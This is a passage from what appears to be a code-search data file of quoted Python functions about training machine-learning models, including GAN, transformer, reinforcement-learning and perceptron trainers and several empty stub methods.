train_perceptron(train_exs, feat_extractor)\n elif args.model == \"LR\":\n model = train_logistic_regression(train_exs, feat_extractor)\n else:\n raise Exception(\"Pass in TRIVIAL, PERCEPTRON, or LR to run the appropriate system\")\n return model", "def main(unused_argv):\n model_params = sketch_rnn_model.get_default_hparams()\n if FLAGS.hparams:\n model_params.parse(FLAGS.hparams)\n trainer(model_params)", "def trainModel( self, featureTrain, classTrain):", "def _create_pipiline(tokenizer, model, device, framework):\n tg_params = dict(\n task=\"text-generation\", tokenizer=tokenizer, model=model,\n framework=\"pt\", device=device,\n )\n text_generation_pipiline = pipeline(**tg_params)\n return text_generation_pipiline", "def make_training_nodes(discriminator):\n return classification_metrics(\n [1],\n discriminator.output_node,\n \"discriminator_training\",\n variables=discriminator.get_variables(),\n )", "def main():\n model = th.nn.Linear(1, 1)\n optim = th.optim.Adam(model.parameters(), lr=1e-3)\n\n def loss_fn(model, data):\n x, target = data\n output = model(x)\n loss = th.mean(th.square(output - target))\n return loss\n\n def get_loader():\n while True:\n # NOTE(ycho): `32` here is a dummy fictitious batch size.\n x = th.empty((32, 1), dtype=th.float32)\n y = th.empty((32, 1), dtype=th.float32)\n yield (x, y)\n\n trainer = Trainer(\n Trainer.Settings(train_steps=1),\n model,\n optim,\n loss_fn,\n Hub(),\n get_loader())\n\n trainer.train()", "def test_train(self):\n print \"x=\",self.trainer.train()", "def train(self) -> None:\n\n # Check if in the saved model path there is already a trained model\n if self.config.TRN_HYPERP[\"save_path\"]:\n if tf.saved_model.contains_saved_model(self.config.TRN_HYPERP[\"save_path\"]):\n print(\"INFO: An existing saved model will be used for inference\\n\")\n else:\n params = {**self.config.TRN_HYPERP, **self.config.DATASET_HYPERP}\n trainer = Trainer(**params)\n\n print(f\"INFO: Starting training ... 
\\n\")\n start_time = time.time()\n trainer.train()\n print(f\"\\nINFO: Training completed in {round((time.time() - start_time)/60, 2)} minutes.\\n\")\n\n # Instantiate the saved translator for inference\n saved_path = self.config.TRN_HYPERP[\"save_path\"]\n self.saved_translator = tf.saved_model.load(saved_path)\n else:\n print(\"INFO: Path to save model wasn't provided in config file. Can't train the model\\n\")", "def train_model(self, *args, **kwargs):\n raise NotImplementedError", "def _train_model(self):\n raise NotImplementedError()", "def train_entry_point():", "def create_training(logits):\r\n \r\n\r\n return train_op, loss, label_ph", "def create_pipeline(self, train: LAMLDataset) -> LAMLTransformer:\n raise NotImplementedError", "def create_training(self, weight_spacing = 1.0, weight_bending = 1.0, weight_head_tail = 1.0):\n self.skeleton = tf.placeholder(\"float32\", [1, self.skeleton_size, 2]);\n #self.skeleton_valid = tf.placeholder(\"int32\", [1]);\n #self.head_tail = tf.placeholder(\"float32\", [1, self.head_tail_size, 2]);\n #self.head_tail_valid = tf.placeholder(\"int32\", [1]);\n \n #self.cost = self.create_cost(self.output, self.skeleton, self.skeleton_valid, self.head_tail, self.head_tail_valid, \n # weight_spacing = weight_spacing, weight_bending = weight_bending); #, weight_head_tail = weight_head_tail);\n self.cost = self.create_cost(self.output, self.skeleton, weight_spacing = weight_spacing, weight_bending = weight_bending); \n \n #trainer\n self.trainer = tf.train.RMSPropOptimizer(0.00025,0.99,0.0,1e-6).minimize(self.cost)", "def TracerFactory():\n return Tracer(colors='Linux')", "def train(config, data_path):\n register_data(data_path, prefix='yeast_cells_')\n os.makedirs(config.OUTPUT_DIR, exist_ok=True)\n trainer = DefaultTrainer(config)\n trainer.resume_or_load(resume=True)\n trainer.train()\n return trainer", "def for_supervised_fine_tuning(\n cls,\n formatting_func: Callable[[Dict[str, Any]], Union[None, str, List[str], Iterator[str]]],\n ) -> \"TrainingTaskForSFT\":\n return TrainingTaskForSFT(formatting_func=formatting_func)", "def create_learner(args, df: pd.DataFrame) -> Learner:\n\n # Load tokenizer, model and config from Hugging Face's Transformers\n # Tokenizer\n transformer_tokenizer = AutoTokenizer.from_pretrained(args.pretrained_model_name)\n # Config\n transformer_config = AutoConfig.from_pretrained(args.pretrained_model_name)\n transformer_config.num_labels = df[args.label_col].nunique()\n # Model\n transformer_model = AutoModelForSequenceClassification.from_pretrained(\n args.pretrained_model_name, config=transformer_config\n )\n if args.anonymized_tokens:\n special_tokens_dict = {\n 'additional_special_tokens': ['xxnum','xxphone', 'xxname', 'xxemail', 'xxurl'],\n }\n transformer_tokenizer.add_special_tokens(special_tokens_dict)\n transformer_model.resize_token_embeddings(len(transformer_tokenizer)) \n # save tokenizer for later\n transformer_tokenizer.save_pretrained(args.export_dir)\n\n # custom glue for transformers/fastai tokenizer\n # this is a hack to use Hugging Face's Transformers inside Fast.ai\n transformer_base_tokenizer = TransformersBaseTokenizer(\n pretrained_tokenizer=transformer_tokenizer,\n model_type=args.pretrained_model_type,\n )\n fastai_tokenizer = Tokenizer(\n tok_func=transformer_base_tokenizer, pre_rules=[], post_rules=[]\n )\n transformer_vocab = TransformersVocab(tokenizer=transformer_tokenizer)\n numericalize_processor = NumericalizeProcessor(vocab=transformer_vocab)\n tokenize_processor = TokenizeProcessor(\n 
tokenizer=fastai_tokenizer, include_bos=False, include_eos=False\n )\n transformer_processor = [tokenize_processor, numericalize_processor]\n\n # Create Fastai Databunch\n databunch = (\n TextList.from_df(\n df, cols=args.text_col, processor=transformer_processor, path=args.cache_dir\n )\n .split_from_df(col=args.validation_col)\n .label_from_df(cols=args.label_col)\n .databunch(\n bs=args.batch_size,\n pad_first=args.pad_first,\n pad_idx=transformer_tokenizer.pad_token_id,\n )\n )\n\n # Wrap Transformer Model into Custom Glue\n custom_transformer_model = CustomTransformerModel(\n transformer_model=transformer_model\n )\n\n # wrap optimizer into partial to work with fastai training loop\n CustomAdamW = partial(AdamW, correct_bias=False)\n\n learner = Learner(\n databunch,\n custom_transformer_model,\n opt_func=CustomAdamW,\n callback_fns=[\n partial(\n EarlyStoppingCallback,\n monitor=\"valid_loss\",\n min_delta=args.min_delta,\n patience=args.pacience,\n ),\n ],\n metrics=[accuracy],\n )\n\n if args.track_with_wb:\n # wrap callback into partial to work with fastai training loop\n CustomWandbCallback = partial(WandbCallback, seed=args.random_seed)\n learner.callback_fns.append(CustomWandbCallback)\n\n # Train in FP16 precision mode.\n # TODO test export and inference on CPU\n if args.use_fp16:\n learner = learner.to_fp16()\n\n return learner", "def get_trainer(self):\n return AutoEncoderTrainer", "def get_trainer(name, disable_logging=False):\n return PluginLoader._import(\"train.trainer\", name, disable_logging)", "def Train(w, x, u=None, nep=20, gdy=0, **kwd):\n # the trainer class\n from xnnt.tnr.cmb import Comb as Tnr\n\n # layer-wise greedy pre-training (incremental).\n if gdy > 0:\n for i in range(1, len(w.sa)):\n sw = w.sub(0, i)\n print('pre-train sub-stack:', sw)\n tr = Tnr(sw, x, u=u)\n tr.tune(gdy)\n\n # whole stack fine-tuning\n print('train stack:', w)\n tr = Tnr(w, x, u=u, **kwd)\n tr.tune(nep)\n\n return tr", "def train_naive(): # add arguments as needed\n pass", "def get_train_routine(\n self,\n ) -> Callable[\n [\n torch.utils.data.DataLoader,\n torch.utils.data.DataLoader,\n argparse.Namespace,\n torch.nn.Module,\n torch.optim.Optimizer,\n torch.optim.Optimizer,\n Progress,\n TaskID,\n ],\n None,\n ]:\n pass", "def prepare_training(self, config: TreeConfigParser) -> None:\n callbacks.initiate_wb(config)\n generator = generators.Generator(\n config.get(\"data.output.label.choice\"),\n config.get_int(\"model.batch_size\"),\n config.get_int(\"data.input.aug.rot.range\"),\n config.get_float(\"data.input.aug.shift.range\"),\n config.get_bool(\"data.input.aug.flip.bool\"),\n config.get_float(\"data.input.aug.shear.range\"),\n config.get_float(\"data.input.aug.zoom.range\"),\n )\n list_callbacks = callbacks.create_list_callbacks(\n config.get(\"orga.save.directory\"),\n config.get(\"orga.save.folder\"),\n config.get_bool(\"model.callback.modelcheckpoint\"),\n config.get_bool(\"model.callback.reducelronplateau\"),\n config.get_bool(\"model.callback.earlystopping\"),\n config.get_bool(\"model.callback.wandb\"),\n )\n self.trainer = Trainer(\n generator,\n list_callbacks,\n config.get_int(\"model.batch_size\"),\n config.get_int(\"model.epochs.number\"),\n )", "def train(self):\n pass", "def train(self):\n pass", "def train(self):\n pass", "def train(self):\n pass", "def train(self):\n pass", "def train_tier(args: argparse.Namespace, hp: HParams, tier: int, extension_architecture: str,\n timestamp: str, tensorboardwriter: TensorboardWriter,\n logger: logging.Logger) -> None:\n 
logger.info(f\"Start training of tier {tier}/{hp.network.n_tiers}\")\n\n # Setup the data ready to be consumed\n train_dataloader, test_dataloader, num_samples = get_dataloader(hp)\n\n # Setup tier\n # Calculate size of FREQ dimension for this tier\n tier_freq = tierutil.get_size_freqdim_of_tier(n_mels=hp.audio.mel_channels,\n n_tiers=hp.network.n_tiers,\n tier=tier)\n\n if tier == 1:\n model = Tier1(tier=tier,\n n_layers=hp.network.layers[tier - 1],\n hidden_size=hp.network.hidden_size,\n gmm_size=hp.network.gmm_size,\n freq=tier_freq)\n else:\n model = Tier(tier=tier,\n n_layers=hp.network.layers[tier - 1],\n hidden_size=hp.network.hidden_size,\n gmm_size=hp.network.gmm_size,\n freq=tier_freq)\n model = model.to(hp.device)\n model.train()\n\n # Setup loss criterion and optimizer\n criterion = GMMLoss()\n optimizer = torch.optim.RMSprop(params=model.parameters(),\n lr=hp.training.lr,\n momentum=hp.training.momentum)\n\n # Check if training has to be resumed from previous checkpoint\n if args.checkpoint_path is not None:\n model, optimizer = resume_training(args, hp, tier, model, optimizer, logger)\n else:\n logger.info(f\"Starting new training on dataset {hp.data.dataset} with configuration file \"\n f\"name {hp.name}\")\n\n # Train the tier\n total_iterations = 0\n loss_logging = 0 # accumulated loss between logging iterations\n loss_save = 0 # accumulated loss between saving iterations\n prev_loss_onesample = 1e8 # used to compare between saving iterations and decide whether or not\n # to save the model\n\n for epoch in range(hp.training.epochs):\n logger.info(f\"Epoch: {epoch}/{hp.training.epochs} - Starting\")\n for i, (waveform, utterance) in enumerate(train_dataloader):\n\n # 1.1 Transform waveform input to melspectrogram and apply preprocessing to normalize\n waveform = waveform.to(device=hp.device, non_blocking=True)\n spectrogram = transforms.wave_to_melspectrogram(waveform, hp)\n spectrogram = audio_normalizing.preprocessing(spectrogram, hp)\n # 1.2 Get input and output from the original spectrogram for this tier\n input_spectrogram, output_spectrogram = tierutil.split(spectrogram=spectrogram,\n tier=tier,\n n_tiers=hp.network.n_tiers)\n length_spectrogram = input_spectrogram.size(2)\n # 2. Clear the gradients\n optimizer.zero_grad()\n # 3. Compute the model output\n if tier == 1:\n # generation is unconditional so there is only one input\n mu_hat, std_hat, pi_hat = model(spectrogram=input_spectrogram)\n else:\n # generation is conditional on the spectrogram generated by previous tiers\n mu_hat, std_hat, pi_hat = model(spectrogram=output_spectrogram,\n spectrogram_prev_tier=input_spectrogram)\n # 4. Calculate the loss\n loss = criterion(mu=mu_hat, std=std_hat, pi=pi_hat, target=output_spectrogram)\n del spectrogram\n del mu_hat, std_hat, pi_hat\n\n # 4.1 Check if loss has exploded\n if torch.isnan(loss) or torch.isinf(loss):\n error_msg = f\"Loss exploded at Epoch: {epoch}/{hp.training.epochs} - \" \\\n f\"Iteration: {i * hp.training.batch_size}/{num_samples}\"\n logger.error(error_msg)\n raise Exception(error_msg)\n\n # 5. Perform backpropagation\n loss_cpu = loss.item()\n loss.backward()\n optimizer.step()\n\n # 6. 
Logging and saving model\n loss_oneframe = loss_cpu / (length_spectrogram * hp.training.batch_size)\n loss_logging += loss_oneframe # accumulated loss between logging iterations\n loss_save += loss_oneframe # accumulated loss between saving iterations\n\n # 6.1 Save model (if is better than previous tier)\n if (total_iterations + 1) % hp.training.save_iterations == 0:\n # Calculate average loss of one sample of a batch\n loss_onesample = int(loss_save / hp.training.save_iterations)\n # if loss_onesample of these iterations is lower, the tier is better and we save it\n if loss_onesample < prev_loss_onesample:\n path = f\"{hp.training.dir_chkpt}/tier{tier}_{timestamp}_loss{loss_onesample}.pt\"\n torch.save(obj={'dataset': hp.data.dataset,\n 'tier_idx': tier,\n 'hp': hp,\n 'epoch': epoch,\n 'iterations': i,\n 'total_iterations': total_iterations,\n 'tier': model.state_dict(),\n 'optimizer': optimizer.state_dict()}, f=path)\n logger.info(f\"Model saved to: {path}\")\n prev_loss_onesample = loss_onesample\n loss_save = 0\n\n # 6.2 Logging\n if (total_iterations + 1) % hp.logging.log_iterations == 0:\n # Calculate average loss of one sample of a batch\n loss_onesample = int(loss_logging / hp.logging.log_iterations)\n tensorboardwriter.log_training(hp, loss_onesample, total_iterations)\n logger.info(f\"Epoch: {epoch}/{hp.training.epochs} - \"\n f\"Iteration: {i * hp.training.batch_size}/{num_samples} - \"\n f\"Loss: {loss_onesample}\")\n loss_logging = 0\n\n # 6.3 Evaluate\n if (total_iterations + 1) % hp.training.evaluation_iterations == 0:\n evaluation(hp, tier, test_dataloader, model, criterion, logger)\n total_iterations += 1\n\n # After finishing training: save model, hyperparameters and total loss\n path = f\"{hp.training.dir_chkpt}/tier{tier}_{timestamp}_final.pt\"\n torch.save(obj={'dataset': hp.data.dataset,\n 'tier_idx': tier,\n 'hp': hp,\n 'epoch': epoch,\n 'iterations': evaluation(hp, tier, test_dataloader, model, criterion,\n logger),\n 'total_iterations': total_iterations,\n 'tier': model.state_dict(),\n 'optimizer': optimizer.state_dict()}, f=path)\n logger.info(f\"Model saved to: {path}\")\n tensorboardwriter.log_end_training(hp=hp, loss=-1)\n logger.info(\"Finished training\")", "def get_trainer(config):\r\n # creating rllib config\r\n rl_config = build_trainer_config(config=config)\r\n return TRAINERS[config['_trainer']](config=rl_config)", "def train_with_control_vec_pretrianing(builder, train_ds, eval_ds):\n num_train_examples = builder.info.splits['train'].num_examples\n \n task = {'name': 'extr', 'excluded_label': None}\n num_classes = builder.info.features[task['name']].num_classes \n task['num_classes'] = num_classes\n\n model = models_lib.Model(num_classes=num_classes)\n\n main_task = {'name': 'label', 'excluded_label': 3}\n num_classes = builder.info.features[main_task['name']].num_classes - 1\n main_task['num_classes'] = num_classes \n\n lr_scheduler = tf.keras.experimental.CosineDecayRestarts(\n initial_learning_rate=0.0001, \n first_decay_steps=10*(num_train_examples//FLAGS.pretrain_bs),\n t_mul=2.0,\n m_mul=0.9,\n alpha=0.1)\n optimizer = tf.keras.optimizers.Adam(learning_rate=lr_scheduler)\n\n if FLAGS.ckpt: \n model, optimizer, ckpt, ckpt_manager = load_model(FLAGS.ckpt, model, optimizer)\n else: \n if FLAGS.save_model: \n ckpt = tf.train.Checkpoint(model=model, optimizer=optimizer)\n ckpt_manager = tf.train.CheckpointManager(\n checkpoint=ckpt, \n directory=FLAGS.model_dir+'/pretrain', \n max_to_keep=3 \n )\n else: \n ckpt=None\n ckpt_manager=None\n\n 
print('==========CONTROL VECTOR PRETRAIN==========')\n for epoch in range(FLAGS.pretrain_epochs):\n print('==========EPOCH: %s==========' % epoch)\n control_vec_pretrain(\n pretrain_ds=train_ds,\n model=model,\n optimizer=optimizer,\n task=task,\n epochs=1,\n lineareval_epochs=0,\n lineareval_task=None,\n eval_ds=None,\n ckpt_manager=ckpt_manager\n )\n\n head = model.sh\n model.sh = models_lib.SupervisedHead(main_task['num_classes'])\n linear_eval(train_ds, model, main_task, FLAGS.lineareval_epochs, eval_ds=eval_ds)\n\n model.sh = head\n\n model.sh = models_lib.SupervisedHead(main_task['num_classes'])\n linear_eval(train_ds, model, main_task, 30, eval_ds=eval_ds)\n evaluate(eval_ds, model, main_task)", "def train(self, *args, **kwargs):\n return self._train(*args, **kwargs)", "def train(self, *args, **kwargs):\n return self._train(*args, **kwargs)", "def train(settings=None):\n if not settings:\n settings = Settings()\n train_transform = torchvision.transforms.Compose([transforms.RandomlySelectPatchAndRescale(),\n transforms.RandomHorizontalFlip(),\n transforms.NegativeOneToOneNormalizeImage(),\n transforms.NumpyArraysToTorchTensors()])\n validation_transform = torchvision.transforms.Compose([transforms.RandomlySelectPatchAndRescale(),\n transforms.NegativeOneToOneNormalizeImage(),\n transforms.NumpyArraysToTorchTensors()])\n\n train_dataset = CrowdDatasetWithUnlabeled(settings.train_dataset_path, 'train', transform=train_transform)\n train_dataset_loader = torch.utils.data.DataLoader(train_dataset, batch_size=settings.batch_size, shuffle=True,\n num_workers=settings.number_of_data_loader_workers)\n validation_dataset = CrowdDataset(settings.validation_dataset_path, 'validation', transform=validation_transform)\n validation_dataset_loader = torch.utils.data.DataLoader(validation_dataset, batch_size=settings.batch_size,\n shuffle=False,\n num_workers=settings.number_of_data_loader_workers)\n\n gan = GAN()\n gpu(gan)\n D = gan.D\n G = gan.G\n discriminator_optimizer = Adam(D.parameters())\n generator_optimizer = Adam(G.parameters())\n\n step = 0\n epoch = 0\n\n if settings.load_model_path:\n d_model_state_dict, d_optimizer_state_dict, epoch, step = load_trainer(prefix='discriminator',\n settings=settings)\n D.load_state_dict(d_model_state_dict)\n discriminator_optimizer.load_state_dict(d_optimizer_state_dict)\n discriminator_optimizer.param_groups[0].update({'lr': settings.learning_rate, 'weight_decay': settings.weight_decay})\n if settings.load_model_path:\n g_model_state_dict, g_optimizer_state_dict, _, _ = load_trainer(prefix='generator',\n settings=settings)\n G.load_state_dict(g_model_state_dict)\n generator_optimizer.load_state_dict(g_optimizer_state_dict)\n generator_optimizer.param_groups[0].update({'lr': settings.learning_rate})\n\n running_scalars = defaultdict(float)\n validation_running_scalars = defaultdict(float)\n running_example_count = 0\n datetime_string = datetime.datetime.now().strftime(\"y%Ym%md%dh%Hm%Ms%S\")\n trial_directory = os.path.join(settings.log_directory, settings.trial_name + ' ' + datetime_string)\n os.makedirs(trial_directory, exist_ok=True)\n summary_writer = SummaryWriter(os.path.join(trial_directory, 'train'))\n validation_summary_writer = SummaryWriter(os.path.join(trial_directory, 'validation'))\n print('Starting training...')\n step_time_start = datetime.datetime.now()\n while epoch < settings.number_of_epochs:\n for examples, unlabeled_examples in train_dataset_loader:\n unlabeled_images = unlabeled_examples[0]\n # Real image discriminator 
processing.\n discriminator_optimizer.zero_grad()\n images, labels, _ = examples\n images, labels = Variable(gpu(images)), Variable(gpu(labels))\n current_batch_size = images.data.shape[0]\n predicted_labels, predicted_counts = D(images)\n real_feature_layer = D.feature_layer\n density_loss = torch.abs(predicted_labels - labels).pow(settings.loss_order).sum(1).sum(1).mean()\n count_loss = torch.abs(predicted_counts - labels.sum(1).sum(1)).pow(settings.loss_order).mean()\n loss = count_loss + (density_loss * 10)\n loss.backward()\n running_scalars['Labeled/Loss'] += loss.data[0]\n running_scalars['Labeled/Count Loss'] += count_loss.data[0]\n running_scalars['Labeled/Density Loss'] += density_loss.data[0]\n running_scalars['Labeled/Count ME'] += (predicted_counts - labels.sum(1).sum(1)).mean().data[0]\n # Unlabeled.\n _ = D(gpu(images))\n labeled_feature_layer = D.feature_layer\n _ = D(gpu(Variable(unlabeled_images)))\n unlabeled_feature_layer = D.feature_layer\n unlabeled_loss = feature_distance_loss(unlabeled_feature_layer, labeled_feature_layer,\n scale=False) * settings.unlabeled_loss_multiplier\n unlabeled_loss.backward()\n # Fake.\n _ = D(gpu(Variable(unlabeled_images)))\n unlabeled_feature_layer = D.feature_layer\n z = torch.from_numpy(MixtureModel([norm(-settings.mean_offset, 1), norm(settings.mean_offset, 1)]).rvs(\n size=[current_batch_size, 100]).astype(np.float32))\n # z = torch.randn(settings.batch_size, noise_size)\n fake_examples = G(gpu(Variable(z)))\n _ = D(fake_examples.detach())\n fake_feature_layer = D.feature_layer\n fake_loss = feature_distance_loss(unlabeled_feature_layer, fake_feature_layer,\n order=1).neg() * settings.fake_loss_multiplier\n fake_loss.backward()\n # Feature norm loss.\n _ = D(gpu(Variable(unlabeled_images)))\n unlabeled_feature_layer = D.feature_layer\n feature_norm_loss = (unlabeled_feature_layer.norm(dim=1).mean() - 1).pow(2)\n feature_norm_loss.backward()\n # Gradient penalty.\n if settings.gradient_penalty_on:\n alpha = gpu(Variable(torch.rand(2)))\n alpha = alpha / alpha.sum(0)\n interpolates = (alpha[0] * gpu(Variable(unlabeled_images, requires_grad=True)) +\n alpha[1] * gpu(Variable(fake_examples.detach().data, requires_grad=True)))\n _ = D(interpolates)\n interpolates_predictions = D.feature_layer\n gradients = torch.autograd.grad(outputs=interpolates_predictions, inputs=interpolates,\n grad_outputs=gpu(torch.ones(interpolates_predictions.size())),\n create_graph=True, only_inputs=True)[0]\n gradient_penalty = ((gradients.norm(dim=1) - 1) ** 2).mean() * settings.gradient_penalty_multiplier\n gradient_penalty.backward()\n # Discriminator update.\n discriminator_optimizer.step()\n # Generator.\n if step % 1 == 0:\n generator_optimizer.zero_grad()\n _ = D(gpu(Variable(unlabeled_images)))\n unlabeled_feature_layer = D.feature_layer.detach()\n z = torch.randn(current_batch_size, 100)\n fake_examples = G(gpu(Variable(z)))\n _ = D(fake_examples)\n fake_feature_layer = D.feature_layer\n generator_loss = feature_distance_loss(unlabeled_feature_layer, fake_feature_layer)\n generator_loss.backward()\n generator_optimizer.step()\n\n running_example_count += images.size()[0]\n if step % settings.summary_step_period == 0 and step != 0:\n comparison_image = viewer.create_crowd_images_comparison_grid(cpu(images), cpu(labels),\n cpu(predicted_labels))\n summary_writer.add_image('Comparison', comparison_image, global_step=step)\n fake_images_image = torchvision.utils.make_grid(fake_examples.data[:9], nrow=3)\n summary_writer.add_image('Fake', fake_images_image, 
global_step=step)\n print('\\rStep {}, {}...'.format(step, datetime.datetime.now() - step_time_start), end='')\n step_time_start = datetime.datetime.now()\n for name, running_scalar in running_scalars.items():\n mean_scalar = running_scalar / running_example_count\n summary_writer.add_scalar(name, mean_scalar, global_step=step)\n running_scalars[name] = 0\n running_example_count = 0\n for validation_examples in validation_dataset_loader:\n images, labels, _ = validation_examples\n images, labels = Variable(gpu(images)), Variable(gpu(labels))\n predicted_labels, predicted_counts = D(images)\n density_loss = torch.abs(predicted_labels - labels).pow(settings.loss_order).sum(1).sum(1).mean()\n count_loss = torch.abs(predicted_counts - labels.sum(1).sum(1)).pow(settings.loss_order).mean()\n count_mae = torch.abs(predicted_counts - labels.sum(1).sum(1)).mean()\n count_me = (predicted_counts - labels.sum(1).sum(1)).mean()\n validation_running_scalars['Labeled/Density Loss'] += density_loss.data[0]\n validation_running_scalars['Labeled/Count Loss'] += count_loss.data[0]\n validation_running_scalars['Test/Count MAE'] += count_mae.data[0]\n validation_running_scalars['Labeled/Count ME'] += count_me.data[0]\n comparison_image = viewer.create_crowd_images_comparison_grid(cpu(images), cpu(labels),\n cpu(predicted_labels))\n validation_summary_writer.add_image('Comparison', comparison_image, global_step=step)\n for name, running_scalar in validation_running_scalars.items():\n mean_scalar = running_scalar / len(validation_dataset)\n validation_summary_writer.add_scalar(name, mean_scalar, global_step=step)\n validation_running_scalars[name] = 0\n step += 1\n epoch += 1\n if epoch != 0 and epoch % settings.save_epoch_period == 0:\n save_trainer(trial_directory, D, discriminator_optimizer, epoch, step, prefix='discriminator')\n save_trainer(trial_directory, G, generator_optimizer, epoch, step, prefix='generator')\n save_trainer(trial_directory, D, discriminator_optimizer, epoch, step, prefix='discriminator')\n save_trainer(trial_directory, G, generator_optimizer, epoch, step, prefix='generator')\n print('Finished Training')\n return trial_directory", "def training_step(self, **kwargs):\n raise NotImplementedError", "def make_keras_like(trainer, evaluator, validation_loader):\n training_history = {'accuracy': [], 'loss': []}\n validation_history = {'accuracy': [], 'loss': []}\n last_epoch = []\n\n RunningAverage(output_transform=lambda x: x[0]).attach(trainer, 'loss')\n RunningAverage(Accuracy(output_transform=lambda x: (x[1], x[2]))).attach(trainer, 'accuracy')\n\n prog_bar = ProgressBar()\n prog_bar.attach(trainer, ['loss', 'accuracy'])\n\n prog_bar_vd = ProgressBar()\n prog_bar_vd.attach(evaluator)\n from ignite.handlers import Timer\n\n timer = Timer(average=True)\n timer.attach(trainer, start=Events.EPOCH_STARTED,\n resume=Events.EPOCH_STARTED,\n pause=Events.EPOCH_COMPLETED,\n step=Events.EPOCH_COMPLETED)\n\n @trainer.on(Events.EPOCH_COMPLETED)\n def log_validation_results(trainer):\n metrics = trainer.state.metrics\n accuracy = metrics['accuracy'] * 100\n loss = metrics['nll']\n last_epoch.append(0)\n training_history['accuracy'].append(accuracy)\n training_history['loss'].append(loss)\n train_msg = \"Train Epoch {}: acc: {:.2f}% loss: \".format(trainer.state.epoch, accuracy) + \\\n \"{:.2f}, train time: {:.2f}s\".format(loss, timer.value())\n\n evaluator.run(validation_loader)\n metrics = evaluator.state.metrics\n accuracy = metrics['accuracy'] * 100\n loss = metrics['nll']\n 
validation_history['accuracy'].append(accuracy)\n validation_history['loss'].append(loss)\n val_msg = \"Valid Epoch {}: acc: {:.2f}% loss: {:.2f}\".format(trainer.state.epoch, accuracy, loss)\n\n prog_bar_vd.log_message(train_msg + \" --- \" + val_msg)", "def trainer(self):\n return self._trainer", "def __init__(self,\n model_cfg: dict,\n trainer_cfg: dict,\n plan: dict,\n **kwargs\n ):\n super().__init__()\n self.model_cfg = model_cfg\n self.trainer_cfg = trainer_cfg\n self.plan = plan\n\n self.model = self.from_config_plan(\n model_cfg=self.model_cfg,\n plan_arch=self.plan[\"architecture\"],\n plan_anchors=self.plan[\"anchors\"],\n )\n\n self.example_input_array_shape = (\n 1, plan[\"architecture\"][\"in_channels\"], *plan[\"patch_size\"],\n )\n\n self.epoch_start_tic = 0\n self.epoch_end_toc = 0", "def train():\n import trace\n trace.train()", "def init_trainers(self, args):\n self.actors_cur = [None for _ in range(self.num_agents)]\n self.critics_cur = [None for _ in range(self.num_agents)]\n self.actors_tar = [None for _ in range(self.num_agents)]\n self.critics_tar = [None for _ in range(self.num_agents)]\n self.optimizers_c = [None for _ in range(self.num_agents)]\n self.optimizers_a = [None for _ in range(self.num_agents)]\n input_size_global = sum(self.obs_shape_n) + sum(self.action_shape_n)\n\n if args.restore == True: # restore the model\n game_step = int(args.old_model_name.split('_')[-1][:-1])\n for idx in range(self.num_agents):\n self.actors_cur[idx] = torch.load(args.old_model_name+'a_c_{}.pt'.format(idx))\n self.actors_tar[idx] = torch.load(args.old_model_name+'a_t_{}.pt'.format(idx))\n self.critics_cur[idx] = torch.load(args.old_model_name+'c_c_{}.pt'.format(idx))\n self.critics_tar[idx] = torch.load(args.old_model_name+'c_t_{}.pt'.format(idx))\n self.optimizers_a[idx] = optim.Adam(self.actors_cur[idx].parameters(), args.lr_a)\n self.optimizers_c[idx] = optim.Adam(self.critics_cur[idx].parameters(), args.lr_c)\n self.var = self.var - (game_step-args.learning_start_episode*args.per_episode_max_len)*args.var_discount\n self.var = self.min_var if self.var < self.min_var else self.var\n old_data = {'game_step':game_step, 'episode_gone_old':int(game_step/args.per_episode_max_len)}\n\n # Note: if you need load old model, there should be a procedure for juding if the trainers[idx] is None\n for i in range(self.num_agents):\n self.actors_cur[i] = actor_agent(self.obs_shape_n[i], self.action_shape_n[i], \\\n args).to(args.device)\n self.critics_cur[i] = critic_agent(sum(self.obs_shape_n), sum(self.action_shape_n), \\\n args).to(args.device)\n self.actors_tar[i] = actor_agent(self.obs_shape_n[i], self.action_shape_n[i], \\\n args).to(args.device)\n self.critics_tar[i] = critic_agent(sum(self.obs_shape_n), sum(self.action_shape_n), \\\n args).to(args.device)\n self.optimizers_a[i] = optim.Adam(self.actors_cur[i].parameters(), args.lr_a)\n self.optimizers_c[i] = optim.Adam(self.critics_cur[i].parameters(), args.lr_c)\n\n # return the old data, no need to update the trainers\n if args.restore == True: return old_data\n\n self.actors_tar = self.update_trainers(self.actors_cur, self.actors_tar, 1.0) # update the target par using the cur\n self.critics_tar = self.update_trainers(self.critics_cur, self.critics_tar, 1.0) # update the target par using the cur", "def train_model(args: argparse.Namespace, hp: HParams, extension_architecture: str, timestamp: str,\n logger: logging.Logger) -> None:\n # 1. 
Check if we have to train a single tier or a complete model (with several tiers)\n if args.tier is not None:\n # 1.1 Argument tier was defined. Only that tier will be trained.\n logging.info(f\"Training single tier of the model: Tier {args.tier}\")\n\n # 2. Setup tensorboard logging\n # 2.1 Create tensorboard logs directory (tensorboard requires a different folder for each\n # run of the model, in this case every run to train a tier) so we add the extension of the\n # network's architecture of this run and the timestamp to identify it completely\n tensorboard_dir = f\"{hp.logging.dir_log_tensorboard}{extension_architecture}_\" \\\n f\"{timestamp}_tier{args.tier}\"\n Path(tensorboard_dir).mkdir(parents=True, exist_ok=True)\n # 2.2 Create tensorboard writer\n tensorboardwriter = TensorboardWriter(hp, tensorboard_dir)\n\n # 3. Start training of the tier\n train_tier(args, hp, args.tier, extension_architecture, timestamp, tensorboardwriter,\n logger)\n\n tensorboardwriter.close()\n\n else:\n # 1.2 Argument tier was not defined. Train all tiers of the model.\n logging.info(\"Training all tiers of the model\")\n\n for tier in range(1, hp.network.n_tiers + 1):\n # 2. Setup tensorboard logging (one for every tier)\n # 2.1 Create tensorboard logs directory (tensorboard requires a different folder for\n # each run of the model, in this case every run to train a tier) so we add the extension\n # of the network's architecture of this run and the timestamp to identify it completely\n tensorboard_dir = hp.logging.dir_log_tensorboard + extension_architecture \\\n + f\"_{timestamp}_tier{tier}\"\n Path(tensorboard_dir).mkdir(parents=True, exist_ok=True)\n # 2.2 Create tensorboard writer\n tensorboardwriter = TensorboardWriter(hp, tensorboard_dir)\n\n # 3. Start training of the tier\n train_tier(args, hp, tier, extension_architecture, timestamp, tensorboardwriter, logger)\n\n tensorboardwriter.close()\n del tensorboardwriter", "def __init__(self, vocabulary, decorator, max_sequence_length=256, no_cuda=True, mode=\"train\"):\n self.vocabulary = vocabulary\n self.max_sequence_length = max_sequence_length\n self.network = decorator\n self._model_modes = GenerativeModelRegimeEnum()\n\n if torch.cuda.is_available() and not no_cuda:\n self.network.cuda()\n\n self._nll_loss = tnn.NLLLoss(reduction=\"none\", ignore_index=0)\n self.set_mode(mode)", "def trainer(model,\n 